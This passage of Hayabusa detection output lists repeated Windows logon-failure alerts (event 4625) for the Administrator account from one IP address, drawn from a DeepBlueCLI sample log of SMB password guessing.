+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.961 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.457 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.961 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.417 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.864 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.316 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: 